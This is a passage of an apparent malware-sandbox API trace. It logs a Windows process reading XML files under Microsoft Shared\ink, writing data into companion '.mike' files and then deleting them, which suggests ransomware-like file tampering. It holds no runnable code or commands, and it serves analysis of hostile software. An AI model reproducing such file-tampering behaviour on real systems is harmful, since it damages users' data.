Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", lpFilePart=0x0) returned 0x57 [0045.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.878] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58bea80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58bea80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58bea80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x550)) returned 1 [0045.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.878] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.878] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", lpFilePart=0x0) returned 0x57 [0045.878] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike")) returned 1 [0045.879] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.879] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.879] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.881] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.881] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.881] GetFileType (hFile=0x264) returned 0x1 [0045.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.881] GetFileType (hFile=0x264) returned 0x1 [0045.881] CloseHandle (hObject=0x264) returned 1 [0045.882] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.882] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.882] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.882] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.882] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), fInfoLevelId=0x0, lpFileInformation=0x21cf87c | out: lpFileInformation=0x21cf87c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1e8)) returned 1 [0045.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.882] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.882] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), fInfoLevelId=0x0, lpFileInformation=0x21cfbc8 | out: lpFileInformation=0x21cfbc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1e8)) returned 1 [0045.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.882] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", lpFilePart=0x0) returned 0x57 [0045.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.883] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", lpFilePart=0x0) returned 0x57 [0045.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.883] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", lpFilePart=0x0) returned 0x57 [0045.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.884] GetFileType (hFile=0x264) returned 0x1 [0045.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.884] GetFileType (hFile=0x264) returned 0x1 [0045.884] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.884] WriteFile (in: hFile=0x264, lpBuffer=0x21d0b7c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21d0b7c*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.885] CloseHandle (hObject=0x264) returned 1 [0045.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.885] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), fInfoLevelId=0x0, lpFileInformation=0x21d063c | out: lpFileInformation=0x21d063c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1e8)) returned 1 [0045.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.885] GetFileType (hFile=0x264) returned 0x1 [0045.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.886] GetFileType (hFile=0x264) returned 0x1 [0045.886] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.886] ReadFile (in: hFile=0x264, lpBuffer=0x21d1cc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21d1cc0*, lpNumberOfBytesRead=0x2af038*=0x1e8, lpOverlapped=0x0) returned 1 [0045.886] CloseHandle (hObject=0x264) returned 1 [0045.887] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", lpFilePart=0x0) returned 0x57 [0045.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.887] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.887] GetFileType (hFile=0x264) returned 0x1 [0045.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.887] GetFileType (hFile=0x264) returned 0x1 [0045.887] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.887] WriteFile (in: hFile=0x264, lpBuffer=0x21d5704*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21d5704*, lpNumberOfBytesWritten=0x2af02c*=0x1f0, lpOverlapped=0x0) returned 1 [0045.887] CloseHandle (hObject=0x264) returned 1 [0045.888] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", lpFilePart=0x0) returned 0x57 [0045.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.888] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.888] GetFileType (hFile=0x264) returned 0x1 [0045.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.888] GetFileType (hFile=0x264) returned 0x1 [0045.889] WriteFile (in: hFile=0x264, lpBuffer=0x21d8944*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21d8944*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.889] CloseHandle (hObject=0x264) returned 1 [0045.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", lpFilePart=0x0) returned 0x57 [0045.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.890] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58e4be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58e4be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58e4be0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x410)) returned 1 [0045.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", lpFilePart=0x0) returned 0x57 [0045.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.890] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21da164 | out: lpFileInformation=0x21da164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58e4be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58e4be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58e4be0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x410)) returned 1 [0045.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.891] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", dwFileAttributes=0x80) returned 0 [0045.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", lpFilePart=0x0) returned 0x57 [0045.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.892] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58e4be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58e4be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58e4be0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x410)) returned 1 [0045.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpFilePart=0x0) returned 0x52 [0045.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike", lpFilePart=0x0) returned 0x57 [0045.892] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.mike")) returned 1 [0045.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.893] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.894] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.895] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.895] GetFileType (hFile=0x264) returned 0x1 [0045.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 